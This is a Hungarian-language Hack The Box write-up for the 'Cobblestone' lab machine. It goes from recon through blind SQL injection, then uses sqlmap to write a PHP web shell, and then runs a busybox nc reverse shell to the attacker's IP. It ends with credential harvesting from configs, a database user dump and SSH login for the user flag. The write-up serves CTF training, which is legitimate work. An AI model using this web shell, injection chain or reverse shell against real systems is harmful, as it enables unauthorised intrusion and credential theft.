Cobblestone - Hack The Box
Platform: Linux
IP: 10.10.11.81
Difficulty: Insane
Author: NoSec
mélyebbre mennél? csatlakozz a backdoor crew-hoz és kapj exkluzív videókat & korai hozzáférést a root chainekhez
💀 csatlakozz a backdoor crew-hozA hosts fájl szerkesztése
Adja hozzá a Cobblestone domain neveket, hogy a vhostok feloldódjanak.
sudo nano /etc/hosts
10.10.11.81 cobblestone.htb vote.cobblestone.htb
Felderítés – Szolgáltatások felsorolása
Nmap port szkennelés
Két nyitott port: web + SSH.
nmap -sVC cobblestone.htb
PORT ÁLLAPOT SZOLGÁLTATÁS VERZIÓ
Nmap 7.95 ( https://nmap.org ) indítása 2025-08-17 12:02 CEST
Nmap szkennelési jelentés a 10.10.11.81 címre
A gazdagép elérhető (0,030 másodperc késleltetés).
Nem jelenik meg: 998 zárt tcp port (visszaállítás)
PORT ÁLLAPOT SZOLGÁLTATÁS VÁLTOZAT
22/tcp nyitva ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protokoll 2.0)
| ssh-hostkey:
| 256 50:ef:5f:db:82:03:36:51:27:6c:6b:a6:fc:3f:5a:9f (ECDSA)
|_ 256 e2:1d:f3:e9:6a:ce:fb:e0:13:9b:07:91:28:38:ec:5d (ED25519)
80/tcp nyitva http Apache httpd 2.4.62
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Nem követte az átirányítást a http://cobblestone.htb/ oldalra
Szolgáltatási információk: Hoszt: 127.0.0.1; Operációs rendszer: Linux; CPE: cpe:/o:linux:linux_kernel
A szolgáltatás felismerése megtörtént. Kérjük, hogy a hibás eredményeket jelentsék a https://nmap.org/submit/ címre.
Nmap kész: 1 IP-cím (1 gazdagép aktív) beolvasva 8,33 másodperc alatt
Vhosts / felület
- cobblestone.htb – főoldal (skin feltöltő; sandbox hangulat)
- vote.cobblestone.htb – „URL beküldése szavazásra” (szerveroldali lekérés)
Hibaazonosító — Blind SQLi @ vote.cobblestone.htb
A vote.cobblestone.htb oldalon az URL mező szerveroldalon kerül feldolgozásra. A gyors payload flip boolean válaszokat mutat → BSQLi.
http://x'+AND+»1«='1 # ok
http://x'+AND+»1«='2 # különböző válasz
Rögzítse a POST-ot a Burp segítségével, és mentse vote.req néven.
Fegyverkezzen fel az sqlmap segítségével
Sorolja fel, majd használja vissza a --file-write parancsot, hogy egy webshell-t helyezzen el a Vote vhost-on belül (a főoldal zárolva van, ez viszont nem).
# felsorolás
sqlmap -r vote.req -p url --level 5 --risk 3 --batch --threads 5
# (opcionális) mentse el, amire szüksége van
sqlmap -r vote.req --batch -D vote --dump-all
# helyezze el a shell-t a szavazási alkalmazás gyökérkönyvtárába
sqlmap -r vote.req --batch \
--file-write=./shell.php \
--file-dest=/var/www/vote/shell.php
shell.php:
<?php system($_REQUEST[»cmd«] ?? »id«);
Shell —> www-data
Indíts egy hallgatót:
nc -lvnp 4444
Indítsd el a visszafordítást:
curl -s http://vote.cobblestone.htb/shell.php \
--data-urlencode »cmd=busybox nc YOUR_IP 4444 -e /bin/bash«
Most www-data vagy a Vote kontextusban (nincs jail).
Hitelesítő adatok → SSH felhasználó
Keresse meg a konfigurációkat és a DB hitelesítő adatait az alkalmazásból:
# közös tároló
ls -la /var/www/vote
grep -R „pass\|user\|dsn” -n /var/www/vote 2>/dev/null | head
# ha DB hitelesítő adatokat talált, mentse a felhasználókat
mysql -u DBUSER -p'DBPASS' -h 127.0.0.1 vote -e »select * from users;«
Próbáld meg a visszaállított jelszót a `` felhasználóhoz SSH-n keresztül:
ssh cobble@cobblestone.htb
Ha korlátozott shell-be kerülsz (rbash), az nem baj — csak a flagre van szükséged.
Felhasználói flag
cat ~/user.txt
✅ Felhasználói flag megszerzése!
🔐 A root rész később, a privát Telegram csoportban jelenik meg, amíg a box aktív.\ 📡 t.me/nosecpwn
☕ hívj meg egy kávéra, hogy ne aludjak el a következő writeup írása közben
💻 támogasd a nosec-et